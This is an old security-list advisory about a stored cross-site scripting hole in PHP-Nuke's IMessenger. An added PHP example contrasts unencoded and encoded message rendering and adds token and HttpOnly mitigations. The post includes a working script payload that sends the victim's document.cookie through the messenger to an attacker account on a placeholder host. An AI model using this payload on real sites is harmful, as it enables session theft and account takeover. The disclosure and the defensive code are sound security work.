Serious bug in IMessenger ( php-nuke )

From: frog frog (leseulfrogat_private)
Date: Sat Dec 15 2001 - 19:00:01 PST

    IMessenger accepts JavaScript.
    
    We can thus directly execute JavaScript on the 
    computer of a member or the webmaster.
    
    For example, if I send the script
    
    <*s*cript>window.location.href='http://www.SERVER.com/im.php?username_to=h4x0r&subject='
    + document.cookie
    + '&message=message&action=send';</s*cript>
    
    (without the '*'), to the webmaster, his cookie will be 
    sent to the user h4x0r.
    
    PHPNuke was alerted.
    
    frog-m@n
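
The following is an added example, not part of the original post and not IMessenger or PHP-Nuke source: it shows the unencoded rendering pattern the report describes next to an output-encoded version, plus two mitigations for the cookie-forwarding effect. All function names, array keys and the token scheme are hypothetical, and the sample message is constructed.

```php
<?php
// Added example: hypothetical helpers, not IMessenger or PHP-Nuke source.

// Encode untrusted text for an HTML body or quoted-attribute context.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Pattern described in the post: stored fields echoed verbatim, so any
// markup in a received message is interpreted by the reader's browser.
function render_message_unsafe(array $m): string {
    return "<h3>{$m['subject']}</h3><div>{$m['message']}</div>";
}

// Hardened: every stored field is encoded at output time; line breaks are
// added only after encoding so nl2br's <br> tags are the sole markup.
function render_message(array $m): string {
    return '<h3>' . h($m['subject']) . '</h3><div>'
         . nl2br(h($m['message'])) . '</div>';
}

// The send action in the post is driven by a plain GET URL. Accepting only
// POST with a per-session token means a navigation alone cannot send mail.
function send_allowed(string $method, array $post, array $session): bool {
    return $method === 'POST'
        && isset($post['token'], $session['token'])
        && is_string($post['token'])
        && is_string($session['token'])
        && hash_equals($session['token'], $post['token']);
}

// Options for session_set_cookie_params() (array form, PHP 7.3+).
// HttpOnly keeps the session cookie out of document.cookie.
function session_cookie_options(): array {
    return ['path' => '/', 'secure' => true, 'httponly' => true, 'samesite' => 'Lax'];
}

// Constructed sample message containing markup.
$msg = ['subject' => 'hello', 'message' => "<script>alert(1)</script>\nsecond line"];
echo render_message_unsafe($msg), PHP_EOL; // markup passes through intact
echo render_message($msg), PHP_EOL;        // markup arrives as inert text
var_dump(send_allowed('GET', [], ['token' => 'constructed-token']));
```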
    


